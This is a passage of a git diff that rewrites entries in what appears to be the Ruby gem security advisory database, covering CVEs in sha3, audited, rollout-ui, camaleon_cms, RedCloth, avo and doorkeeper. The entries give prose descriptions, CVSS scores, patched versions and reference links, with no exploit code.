+      at the `info` logging level during the `kitchen converge` action.
+      Prior to v7.0.0, the output values were printed at the `debug` level
+      to avoid writing sensitive values to the terminal by default.
+
+    ### Original Report
+      @brettcurtis:
+        Hopefully, I'm not doing something stupid here, but I'm seeing
+        sensitive outputs printed in the kitchen output. You can check
+        this action for an example: https://github.com/osinfra-io/terraform-google-project/actions/runs/4700065515/jobs/8334277309#step:5:215
+
+        It's not really a sensitive value just used it as an example.
+  cvss_v3: 3.2
+  unaffected_versions:
+  - "< 7.0.0"
+  patched_versions:
+  - ">= 7.0.1"
+  related:
+    url:
+    - https://github.com/newcontext-oss/kitchen-terraform/security/advisories/GHSA-65g2-x53q-cmf6
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30618
+    - https://github.com/newcontext-oss/kitchen-terraform/commit/3d20d60e7a891e2dd747df995a31226fa0b4ac48
+    - https://github.com/advisories/GHSA-65g2-x53q-cmf6
+---
diff --git a/advisories/_posts/2023-04-26-CVE-2022-37454.md b/advisories/_posts/2023-04-26-CVE-2022-37454.md
index a37f3229..0e38333d 100644
--- a/advisories/_posts/2023-04-26-CVE-2022-37454.md
+++ b/advisories/_posts/2023-04-26-CVE-2022-37454.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2022-37454 (sha3): Buffer overflow in sponge queue functions'
-comments: false
-categories:
-- sha3
-advisory:
-  gem: sha3
-  cve: 2022-37454
-  ghsa: 6w4m-2xhg-2658
-  url: https://github.com/XKCP/XKCP/security/advisories/GHSA-6w4m-2xhg-2658
-  title: Buffer overflow in sponge queue functions
-  date: 2023-04-26
-  description: |
-    Impact
-      The Keccak sponge function interface accepts partial inputs to be
-      absorbed and partial outputs to be squeezed. A buffer can overflow
-      when partial data with some specific sizes are queued, where at
-      least one of them has a length of 2^32 - 200 bytes or more.
-    Patches
-      Yes, see commit [fdc6fef0](https://github.com/XKCP/XKCP/commit/fdc6fef075f4e81d6b1bc38364248975e08e340a).
-    Workarounds
-      The problem can be avoided by limiting the size of the partial
-      input data (or partial output digest) below 2^32 - 200 bytes.
-      Multiple calls to the queue system can be chained at a higher
-      level to retain the original functionality. Alternatively, one
-      can process the entire input (or produce the entire output) at
-      once, avoiding the queuing functions altogether.
-    References
-      See [issue #105](https://github.com/XKCP/XKCP/issues/105) for more details.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.0.5"
-  related:
-    url:
-    - https://github.com/XKCP/XKCP/security/advisories/GHSA-6w4m-2xhg-2658
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-37454
-    - https://github.com/XKCP/XKCP/issues/105
-    - https://github.com/johanns/sha3/issues/17
-    - https://github.com/tiran/pysha3/issues/29
-    - https://github.com/XKCP/XKCP/commit/fdc6fef075f4e81d6b1bc38364248975e08e340a
-    - https://github.com/johanns/sha3/commit/5f2e8118a62831911703c8753ff2435c3b5d7312
-    - https://csrc.nist.gov/projects/hash-functions/sha-3-project
-    - https://eprint.iacr.org/2023/331
-    - https://lists.debian.org/debian-lts-announce/2022/10/msg00041.html
-    - https://lists.debian.org/debian-lts-announce/2022/11/msg00000.html
-    - https://mouha.be/sha-3-buffer-overflow/
-    - https://www.debian.org/security/2022/dsa-5267
-    - https://www.debian.org/security/2022/dsa-5269
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ALQ6BDDPX5HU5YBQOBMDVAA2TSGDKIJ
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CMIEXLMTW5GO36HTFFWIPB3OHZXCT3G4/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CMIEXLMTW5GO36HTFFWIPB3OHZXCT3G4
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ALQ6BDDPX5HU5YBQOBMDVAA2TSGDKIJ
-    - https://github.com/advisories/GHSA-6w4m-2xhg-2658
----
+---
+layout: advisory
+title: 'CVE-2022-37454 (sha3): Buffer overflow in sponge queue functions'
+comments: false
+categories:
+- sha3
+advisory:
+  gem: sha3
+  cve: 2022-37454
+  ghsa: 6w4m-2xhg-2658
+  url: https://github.com/XKCP/XKCP/security/advisories/GHSA-6w4m-2xhg-2658
+  title: Buffer overflow in sponge queue functions
+  date: 2023-04-26
+  description: |
+    Impact
+      The Keccak sponge function interface accepts partial inputs to be
+      absorbed and partial outputs to be squeezed. A buffer can overflow
+      when partial data with some specific sizes are queued, where at
+      least one of them has a length of 2^32 - 200 bytes or more.
+    Patches
+      Yes, see commit [fdc6fef0](https://github.com/XKCP/XKCP/commit/fdc6fef075f4e81d6b1bc38364248975e08e340a).
+    Workarounds
+      The problem can be avoided by limiting the size of the partial
+      input data (or partial output digest) below 2^32 - 200 bytes.
+      Multiple calls to the queue system can be chained at a higher
+      level to retain the original functionality. Alternatively, one
+      can process the entire input (or produce the entire output) at
+      once, avoiding the queuing functions altogether.
+    References
+      See [issue #105](https://github.com/XKCP/XKCP/issues/105) for more details.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.0.5"
+  related:
+    url:
+    - https://github.com/XKCP/XKCP/security/advisories/GHSA-6w4m-2xhg-2658
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37454
+    - https://github.com/XKCP/XKCP/issues/105
+    - https://github.com/johanns/sha3/issues/17
+    - https://github.com/tiran/pysha3/issues/29
+    - https://github.com/XKCP/XKCP/commit/fdc6fef075f4e81d6b1bc38364248975e08e340a
+    - https://github.com/johanns/sha3/commit/5f2e8118a62831911703c8753ff2435c3b5d7312
+    - https://csrc.nist.gov/projects/hash-functions/sha-3-project
+    - https://eprint.iacr.org/2023/331
+    - https://lists.debian.org/debian-lts-announce/2022/10/msg00041.html
+    - https://lists.debian.org/debian-lts-announce/2022/11/msg00000.html
+    - https://mouha.be/sha-3-buffer-overflow/
+    - https://www.debian.org/security/2022/dsa-5267
+    - https://www.debian.org/security/2022/dsa-5269
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ALQ6BDDPX5HU5YBQOBMDVAA2TSGDKIJ
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CMIEXLMTW5GO36HTFFWIPB3OHZXCT3G4/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CMIEXLMTW5GO36HTFFWIPB3OHZXCT3G4
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ALQ6BDDPX5HU5YBQOBMDVAA2TSGDKIJ
+    - https://github.com/advisories/GHSA-6w4m-2xhg-2658
+---
diff --git a/advisories/_posts/2023-05-01-CVE-2024-22047.md b/advisories/_posts/2023-05-01-CVE-2024-22047.md
index d66f34fa..af0457fe 100644
--- a/advisories/_posts/2023-05-01-CVE-2024-22047.md
+++ b/advisories/_posts/2023-05-01-CVE-2024-22047.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2024-22047 (audited): Race Condition leading to logging errors'
-comments: false
-categories:
-- audited
-advisory:
-  gem: audited
-  cve: 2024-22047
-  ghsa: hjp3-5g2q-7jww
-  url: https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww
-  title: Race Condition leading to logging errors
-  date: 2023-05-01
-  description: |
-    In certain setups with threaded web servers, Audited's use of
-    `Thread.current` can incorrectly attributed audits to the wrong user.
-
-    Fixed in 5.3.3.
-
-    In March, @convisoappsec noticed that the library in question had a
-    Race Condition problem, which caused logs to be registered at times
-    with different users than those who performed the genuine actions.
-
-    - The first issue we identified was from November
-      2021: https://github.com/collectiveidea/audited/issues/601
-
-    - So the solution was implemented in the following Pull Request:
-      https://github.com/collectiveidea/audited/pull/669
-
-    - And the feature was published in version 5.3.3:
-      RELEASE: https://github.com/collectiveidea/audited/pull/671
-  cvss_v3: 3.1
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - ">= 5.3.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-22047
-    - https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww
-    - https://github.com/collectiveidea/audited/issues/601
-    - https://github.com/collectiveidea/audited/pull/669
-    - https://github.com/collectiveidea/audited/pull/671
-    - https://github.com/advisories/GHSA-hjp3-5g2q-7jww
----
+---
+layout: advisory
+title: 'CVE-2024-22047 (audited): Race Condition leading to logging errors'
+comments: false
+categories:
+- audited
+advisory:
+  gem: audited
+  cve: 2024-22047
+  ghsa: hjp3-5g2q-7jww
+  url: https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww
+  title: Race Condition leading to logging errors
+  date: 2023-05-01
+  description: |
+    In certain setups with threaded web servers, Audited's use of
+    `Thread.current` can incorrectly attributed audits to the wrong user.
+
+    Fixed in 5.3.3.
+
+    In March, @convisoappsec noticed that the library in question had a
+    Race Condition problem, which caused logs to be registered at times
+    with different users than those who performed the genuine actions.
+
+    - The first issue we identified was from November
+      2021: https://github.com/collectiveidea/audited/issues/601
+
+    - So the solution was implemented in the following Pull Request:
+      https://github.com/collectiveidea/audited/pull/669
+
+    - And the feature was published in version 5.3.3:
+      RELEASE: https://github.com/collectiveidea/audited/pull/671
+  cvss_v3: 3.1
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - ">= 5.3.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22047
+    - https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww
+    - https://github.com/collectiveidea/audited/issues/601
+    - https://github.com/collectiveidea/audited/pull/669
+    - https://github.com/collectiveidea/audited/pull/671
+    - https://github.com/advisories/GHSA-hjp3-5g2q-7jww
+---
diff --git a/advisories/_posts/2023-05-23-CVE-2023-25309.md b/advisories/_posts/2023-05-23-CVE-2023-25309.md
index 474f9745..8d42a8c1 100644
--- a/advisories/_posts/2023-05-23-CVE-2023-25309.md
+++ b/advisories/_posts/2023-05-23-CVE-2023-25309.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2023-25309 (rollout-ui): Cross Site Scripting (XSS) Vulnerability in Fetlife
-  rollout-ui gem v0.5'
-comments: false
-categories:
-- rollout-ui
-advisory:
-  gem: rollout-ui
-  cve: 2023-25309
-  ghsa: 5xq9-h3j2-jxvc
-  url: https://github.com/advisories/GHSA-5xq9-h3j2-jxvc
-  title: Cross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui gem v0.5
-  date: 2023-05-23
-  description: |
-    Cross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui
-    version 0.5, allows attackers to execute arbitrary code via a
-    crafted url to the delete a **feature** functionality.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.5.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-25309
-    - https://github.com/fetlife/rollout-ui/releases/tag/v0.5.3
-    - https://github.com/fetlife/rollout-ui/pull/15
-    - https://github.com/fetlife/rollout-ui/pull/15/commits/6d202d2cbcae3dd9b92c1f5ab7be17b48d78c045
-    - https://advisories.gitlab.com/pkg/gem/rollout-ui/CVE-2023-25309
-    - https://github.com/advisories/GHSA-5xq9-h3j2-jxvc
----
+---
+layout: advisory
+title: 'CVE-2023-25309 (rollout-ui): Cross Site Scripting (XSS) Vulnerability in Fetlife
+  rollout-ui gem v0.5'
+comments: false
+categories:
+- rollout-ui
+advisory:
+  gem: rollout-ui
+  cve: 2023-25309
+  ghsa: 5xq9-h3j2-jxvc
+  url: https://github.com/advisories/GHSA-5xq9-h3j2-jxvc
+  title: Cross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui gem v0.5
+  date: 2023-05-23
+  description: |
+    Cross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui
+    version 0.5, allows attackers to execute arbitrary code via a
+    crafted url to the delete a **feature** functionality.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.5.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25309
+    - https://github.com/fetlife/rollout-ui/releases/tag/v0.5.3
+    - https://github.com/fetlife/rollout-ui/pull/15
+    - https://github.com/fetlife/rollout-ui/pull/15/commits/6d202d2cbcae3dd9b92c1f5ab7be17b48d78c045
+    - https://advisories.gitlab.com/pkg/gem/rollout-ui/CVE-2023-25309
+    - https://github.com/advisories/GHSA-5xq9-h3j2-jxvc
+---
diff --git a/advisories/_posts/2023-05-26-CVE-2023-30145.md b/advisories/_posts/2023-05-26-CVE-2023-30145.md
index dbb2f16a..345108ad 100644
--- a/advisories/_posts/2023-05-26-CVE-2023-30145.md
+++ b/advisories/_posts/2023-05-26-CVE-2023-30145.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2023-30145 (camaleon_cms): Server-Side Template Injection in Camaleon
-  CMS'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2023-30145
-  ghsa: x487-866m-p8hr
-  url: http://packetstormsecurity.com/files/172593/Camaleon-CMS-2.7.0-Server-Side-Template-Injection.html
-  title: Server-Side Template Injection in Camaleon CMS
-  date: 2023-05-26
-  description: |
-    Camaleon CMS prior to 2.7.4 was discovered to contain a Server-Side
-    Template Injection (SSTI) vulnerability via the `formats` parameter.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.7.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-30145
-    - https://github.com/paragbagul111/CVE-2023-30145
-    - http://packetstormsecurity.com/files/172593/Camaleon-CMS-2.7.0-Server-Side-Template-Injection.html
-    - https://github.com/owen2345/camaleon-cms/issues/1052
-    - https://github.com/owen2345/camaleon-cms/commit/4485788c544eb1aae52ca613bd9626129e3df6ee
-    - https://github.com/owen2345/camaleon-cms/releases/tag/2.7.4
-    - https://drive.google.com/file/d/11MsSYqUnDRFjcwbQKJeL9Q8nWpgVYf2r/view?usp=share_link
-    - https://portswigger.net/research/server-side-template-injection
-    - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
-    - https://github.com/advisories/GHSA-x487-866m-p8hr
----
+---
+layout: advisory
+title: 'CVE-2023-30145 (camaleon_cms): Server-Side Template Injection in Camaleon
+  CMS'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2023-30145
+  ghsa: x487-866m-p8hr
+  url: http://packetstormsecurity.com/files/172593/Camaleon-CMS-2.7.0-Server-Side-Template-Injection.html
+  title: Server-Side Template Injection in Camaleon CMS
+  date: 2023-05-26
+  description: |
+    Camaleon CMS prior to 2.7.4 was discovered to contain a Server-Side
+    Template Injection (SSTI) vulnerability via the `formats` parameter.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.7.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30145
+    - https://github.com/paragbagul111/CVE-2023-30145
+    - http://packetstormsecurity.com/files/172593/Camaleon-CMS-2.7.0-Server-Side-Template-Injection.html
+    - https://github.com/owen2345/camaleon-cms/issues/1052
+    - https://github.com/owen2345/camaleon-cms/commit/4485788c544eb1aae52ca613bd9626129e3df6ee
+    - https://github.com/owen2345/camaleon-cms/releases/tag/2.7.4
+    - https://drive.google.com/file/d/11MsSYqUnDRFjcwbQKJeL9Q8nWpgVYf2r/view?usp=share_link
+    - https://portswigger.net/research/server-side-template-injection
+    - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
+    - https://github.com/advisories/GHSA-x487-866m-p8hr
+---
diff --git a/advisories/_posts/2023-06-06-CVE-2023-31606.md b/advisories/_posts/2023-06-06-CVE-2023-31606.md
index 64360f48..1dd265ea 100644
--- a/advisories/_posts/2023-06-06-CVE-2023-31606.md
+++ b/advisories/_posts/2023-06-06-CVE-2023-31606.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2023-31606 (RedCloth): RedCloth Regular Expression Denial of Service issue'
-comments: false
-categories:
-- RedCloth
-advisory:
-  gem: RedCloth
-  cve: 2023-31606
-  ghsa: qcm3-vfq5-wfr2
-  url: https://github.com/e23e/CVE-2023-31606#readme
-  title: RedCloth Regular Expression Denial of Service issue
-  date: 2023-06-06
-  description: |
-    A Regular Expression Denial of Service (ReDoS) issue was discovered
-    in the "sanitize_html" function of RedCloth gem >= v4.0.0.
-    This vulnerability allows attackers to cause a
-    Denial of Service (DoS) via supplying a crafted payload.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - ">= 4.3.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-31606
-    - https://github.com/e23e/CVE-2023-31606#readme
-    - https://github.com/jgarber/redcloth/issues/73
-    - https://github.com/jgarber/redcloth/blob/v4.3.2/lib/redcloth/formatters/html.rb#L327
-    - https://github.com/advisories/GHSA-qcm3-vfq5-wfr2
-    - https://github.com/jgarber/redcloth/pull/75
-    - https://github.com/jgarber/redcloth/blob/v4.3.3/lib/redcloth/formatters/html.rb#L327
----
+---
+layout: advisory
+title: 'CVE-2023-31606 (RedCloth): RedCloth Regular Expression Denial of Service issue'
+comments: false
+categories:
+- RedCloth
+advisory:
+  gem: RedCloth
+  cve: 2023-31606
+  ghsa: qcm3-vfq5-wfr2
+  url: https://github.com/e23e/CVE-2023-31606#readme
+  title: RedCloth Regular Expression Denial of Service issue
+  date: 2023-06-06
+  description: |
+    A Regular Expression Denial of Service (ReDoS) issue was discovered
+    in the "sanitize_html" function of RedCloth gem >= v4.0.0.
+    This vulnerability allows attackers to cause a
+    Denial of Service (DoS) via supplying a crafted payload.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - ">= 4.3.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-31606
+    - https://github.com/e23e/CVE-2023-31606#readme
+    - https://github.com/jgarber/redcloth/issues/73
+    - https://github.com/jgarber/redcloth/blob/v4.3.2/lib/redcloth/formatters/html.rb#L327
+    - https://github.com/advisories/GHSA-qcm3-vfq5-wfr2
+    - https://github.com/jgarber/redcloth/pull/75
+    - https://github.com/jgarber/redcloth/blob/v4.3.3/lib/redcloth/formatters/html.rb#L327
+---
diff --git a/advisories/_posts/2023-06-06-CVE-2023-34102.md b/advisories/_posts/2023-06-06-CVE-2023-34102.md
index c4acd33e..2ed7a878 100644
--- a/advisories/_posts/2023-06-06-CVE-2023-34102.md
+++ b/advisories/_posts/2023-06-06-CVE-2023-34102.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2023-34102 (avo): avo possible unsafe reflection / partial DoS vulnerability'
-comments: false
-categories:
-- avo
-advisory:
-  gem: avo
-  cve: 2023-34102
-  ghsa: 86h2-2g4g-29qx
-  url: https://github.com/avo-hq/avo/security/advisories/GHSA-86h2-2g4g-29qx
-  title: avo possible unsafe reflection / partial DoS vulnerability
-  date: 2023-06-06
-  description: |
-    ### Summary
-
-    The polymorphic field type stores the classes to operate on when updating
-    a record with user input, and does not validate them in the back end.
-    This can lead to unexpected behavior, remote code execution, or
-    application crashes when viewing a manipulated record.
-
-    ### Details
-
-    After reviewing the polymorphic field implementation and performing
-    some black box approaches, we identified a potential security issue
-    related to the use of safe_constantize / constantize. This Rails
-    functionality is capable of searching for classes within the Rails
-    context and returning the class for further use. Because Avo does
-    not validate user input when updating or creating a new polymorphic
-    resource, it is possible to create database entries with completely
-    different or invalid class names than the preselected ones. Avo
-    assumes that the class specified by the user request is a valid one
-    and attempts to work with it, which may result in dangerous behavior
-    and code execution.
-
-    ### Impact
-
-    The final exploitation of this vulnerability requires more time than
-    is provided in this assessment, but initial testing of the post request
-    shows the potential critical risk. The classes could be instantiated
-    at any point in the code and this could also lead to code execution.
-
-    ### Recommendation
-
-    Avo should be configured to never trust user-supplied input, especially
-    when defining classes for records. In this particular case, Avo can
-    evaluate the options list given for the polymorphic field and only allow
-    strings from that list. With this white-list approach, an attacker
-    cannot supply unintended classes.
-  cvss_v3: 8.3
-  patched_versions:
-  - ">= 2.33.3"
-  related:
-    url:
-    - https://github.com/avo-hq/avo/security/advisories/GHSA-86h2-2g4g-29qx
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-34102
-    - https://github.com/avo-hq/avo/commit/ec117882ddb1b519481bdd046dc3cfa4474e6e17
-    - https://github.com/avo-hq/avo/releases/tag/v2.33.3
-    - https://github.com/advisories/GHSA-86h2-2g4g-29qx
----
+---
+layout: advisory
+title: 'CVE-2023-34102 (avo): avo possible unsafe reflection / partial DoS vulnerability'
+comments: false
+categories:
+- avo
+advisory:
+  gem: avo
+  cve: 2023-34102
+  ghsa: 86h2-2g4g-29qx
+  url: https://github.com/avo-hq/avo/security/advisories/GHSA-86h2-2g4g-29qx
+  title: avo possible unsafe reflection / partial DoS vulnerability
+  date: 2023-06-06
+  description: |
+    ### Summary
+
+    The polymorphic field type stores the classes to operate on when updating
+    a record with user input, and does not validate them in the back end.
+    This can lead to unexpected behavior, remote code execution, or
+    application crashes when viewing a manipulated record.
+
+    ### Details
+
+    After reviewing the polymorphic field implementation and performing
+    some black box approaches, we identified a potential security issue
+    related to the use of safe_constantize / constantize. This Rails
+    functionality is capable of searching for classes within the Rails
+    context and returning the class for further use. Because Avo does
+    not validate user input when updating or creating a new polymorphic
+    resource, it is possible to create database entries with completely
+    different or invalid class names than the preselected ones. Avo
+    assumes that the class specified by the user request is a valid one
+    and attempts to work with it, which may result in dangerous behavior
+    and code execution.
+
+    ### Impact
+
+    The final exploitation of this vulnerability requires more time than
+    is provided in this assessment, but initial testing of the post request
+    shows the potential critical risk. The classes could be instantiated
+    at any point in the code and this could also lead to code execution.
+
+    ### Recommendation
+
+    Avo should be configured to never trust user-supplied input, especially
+    when defining classes for records. In this particular case, Avo can
+    evaluate the options list given for the polymorphic field and only allow
+    strings from that list. With this white-list approach, an attacker
+    cannot supply unintended classes.
+  cvss_v3: 8.3
+  patched_versions:
+  - ">= 2.33.3"
+  related:
+    url:
+    - https://github.com/avo-hq/avo/security/advisories/GHSA-86h2-2g4g-29qx
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34102
+    - https://github.com/avo-hq/avo/commit/ec117882ddb1b519481bdd046dc3cfa4474e6e17
+    - https://github.com/avo-hq/avo/releases/tag/v2.33.3
+    - https://github.com/advisories/GHSA-86h2-2g4g-29qx
+---
diff --git a/advisories/_posts/2023-06-06-CVE-2023-34103.md b/advisories/_posts/2023-06-06-CVE-2023-34103.md
index c0581c5e..7709417f 100644
--- a/advisories/_posts/2023-06-06-CVE-2023-34103.md
+++ b/advisories/_posts/2023-06-06-CVE-2023-34103.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2023-34103 (avo): avo vulnerable to Stored XSS (Cross Site Scripting)
-  in html content based fields'
-comments: false
-categories:
-- avo
-advisory:
-  gem: avo
-  cve: 2023-34103
-  ghsa: 5cr9-5jx3-2g39
-  url: https://github.com/avo-hq/avo/security/advisories/GHSA-5cr9-5jx3-2g39
-  title: avo vulnerable to Stored XSS (Cross Site Scripting) in html content based
-    fields
-  date: 2023-06-06
-  description: |
-    ### Summary
-
-    Some avo fields are vulnerable to XSS when rendering html based content.
-
-    ### Details
-    During the analysis of the web application, a rendered field was
-    discovered that did not filter JS / HTML tags in a safe way and can
-    be abused to execute js code on a client side. The trix field uses
-    the trix editor in the backend to edit rich text data which basically
-    operates with html tags. To display the stored data in a rendered view,
-    the HasHTMLAttributes concern is used. This can be exploited by an
-    attacker to store javascript code in any trix field by intercepting
-    the request and modifying the post data, as the trix editor does not
-    allow adding custom html or js tags on the frontend.
-
-    ### Impact
-
-    Unlike non-persistent XSS, persistent XSS does not require a social
-    engineering phase. Victims of this attack do not need to be tricked
-    into clicking a link or something like that. However, by exploiting
-    such a vulnerability on this particular target, attackers may be able
-    to gain access to accounts that require special protection, such as
-    administrators of the web service, which is what Avo is primarily
-    intended to be used for.
-
-    ### Recommendation
-
-    The content of a field that contains html code should be sanitized
-    using the according rails helper which uses a whitelist of known-safe
-    tags and attributes. Also this security consideration should be
-    applied to the “as_html” attribute as well because it may contain
-    user controlled input as well.
-
-    https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html
-  cvss_v3: 7.3
-  patched_versions:
-  - ">= 2.33.3"
-  related:
-    url:
-    - https://github.com/avo-hq/avo/security/advisories/GHSA-5cr9-5jx3-2g39
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-34103
-    - https://github.com/avo-hq/avo/releases/tag/v2.33.3
-    - https://github.com/avo-hq/avo/commit/7891c01e1fba9ca5d7dbccc43d27f385e5d08563
-    - https://github.com/advisories/GHSA-5cr9-5jx3-2g39
----
+---
+layout: advisory
+title: 'CVE-2023-34103 (avo): avo vulnerable to Stored XSS (Cross Site Scripting)
+  in html content based fields'
+comments: false
+categories:
+- avo
+advisory:
+  gem: avo
+  cve: 2023-34103
+  ghsa: 5cr9-5jx3-2g39
+  url: https://github.com/avo-hq/avo/security/advisories/GHSA-5cr9-5jx3-2g39
+  title: avo vulnerable to Stored XSS (Cross Site Scripting) in html content based
+    fields
+  date: 2023-06-06
+  description: |
+    ### Summary
+
+    Some avo fields are vulnerable to XSS when rendering html based content.
+
+    ### Details
+    During the analysis of the web application, a rendered field was
+    discovered that did not filter JS / HTML tags in a safe way and can
+    be abused to execute js code on a client side. The trix field uses
+    the trix editor in the backend to edit rich text data which basically
+    operates with html tags. To display the stored data in a rendered view,
+    the HasHTMLAttributes concern is used. This can be exploited by an
+    attacker to store javascript code in any trix field by intercepting
+    the request and modifying the post data, as the trix editor does not
+    allow adding custom html or js tags on the frontend.
+
+    ### Impact
+
+    Unlike non-persistent XSS, persistent XSS does not require a social
+    engineering phase. Victims of this attack do not need to be tricked
+    into clicking a link or something like that. However, by exploiting
+    such a vulnerability on this particular target, attackers may be able
+    to gain access to accounts that require special protection, such as
+    administrators of the web service, which is what Avo is primarily
+    intended to be used for.
+
+    ### Recommendation
+
+    The content of a field that contains html code should be sanitized
+    using the according rails helper which uses a whitelist of known-safe
+    tags and attributes. Also this security consideration should be
+    applied to the “as_html” attribute as well because it may contain
+    user controlled input as well.
+
+    https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html
+  cvss_v3: 7.3
+  patched_versions:
+  - ">= 2.33.3"
+  related:
+    url:
+    - https://github.com/avo-hq/avo/security/advisories/GHSA-5cr9-5jx3-2g39
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34103
+    - https://github.com/avo-hq/avo/releases/tag/v2.33.3
+    - https://github.com/avo-hq/avo/commit/7891c01e1fba9ca5d7dbccc43d27f385e5d08563
+    - https://github.com/advisories/GHSA-5cr9-5jx3-2g39
+---
diff --git a/advisories/_posts/2023-06-12-CVE-2023-34246.md b/advisories/_posts/2023-06-12-CVE-2023-34246.md
index 1a11ca2d..4a60d0a6 100644
--- a/advisories/_posts/2023-06-12-CVE-2023-34246.md
+++ b/advisories/_posts/2023-06-12-CVE-2023-34246.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2023-34246 (doorkeeper): Doorkeeper Improper Authentication vulnerability'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  cve: 2023-34246
-  ghsa: 7w2c-w47h-789w
-  url: https://github.com/advisories/GHSA-7w2c-w47h-789w
-  title: Doorkeeper Improper Authentication vulnerability
-  date: 2023-06-12
-  description: |
-    OAuth RFC 8252 says  https://www.rfc-editor.org/rfc/rfc8252#section-8.6
-
-    > the authorization server SHOULD NOT process authorization requests
-    > automatically without user consent or interaction, except when the
-    > identity of the client can be assured. **This includes the case
-    > where the user has previously approved an authorization request
-    > for a given client id**
-
-    But Doorkeeper automatically processes authorization requests without
-    user consent for public clients that have been previous approved.
-    Public clients are inherently  vulnerable to impersonation, their
-    identity cannot be assured.
-
-    Issue https://github.com/doorkeeper-gem/doorkeeper/issues/1589
-
-    Fix https://github.com/doorkeeper-gem/doorkeeper/pull/1646
-  cvss_v3: 4.2
-  patched_versions:
-  - ">= 5.6.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-34246
-    - https://github.com/doorkeeper-gem/doorkeeper/releases/tag/v5.6.6
-    - https://github.com/doorkeeper-gem/doorkeeper/pull/1646
-    - https://github.com/doorkeeper-gem/doorkeeper/issues/1589
-    - https://www.rfc-editor.org/rfc/rfc8252#section-8.6
-    - https://github.com/advisories/GHSA-7w2c-w47h-789w
----
+---
+layout: advisory
+title: 'CVE-2023-34246 (doorkeeper): Doorkeeper Improper Authentication vulnerability'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  cve: 2023-34246
+  ghsa: 7w2c-w47h-789w
+  url: https://github.com/advisories/GHSA-7w2c-w47h-789w
+  title: Doorkeeper Improper Authentication vulnerability
+  date: 2023-06-12
+  description: |
+    OAuth RFC 8252 says  https://www.rfc-editor.org/rfc/rfc8252#section-8.6
+
+    > the authorization server SHOULD NOT process authorization requests
+    > automatically without user consent or interaction, except when the
+    > identity of the client can be assured. **This includes the case
+    > where the user has previously approved an authorization request
+    > for a given client id**
+
+    But Doorkeeper automatically processes authorization requests without
+    user consent for public clients that have been previous approved.
+    Public clients are inherently  vulnerable to impersonation, their
+    identity cannot be assured.
+
+    Issue https://github.com/doorkeeper-gem/doorkeeper/issues/1589
+
+    Fix https://github.com/doorkeeper-gem/doorkeeper/pull/1646
+  cvss_v3: 4.2
+  patched_versions:
+  - ">= 5.6.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34246
+    - https://github.com/doorkeeper-gem/doorkeeper/releases/tag/v5.6.6
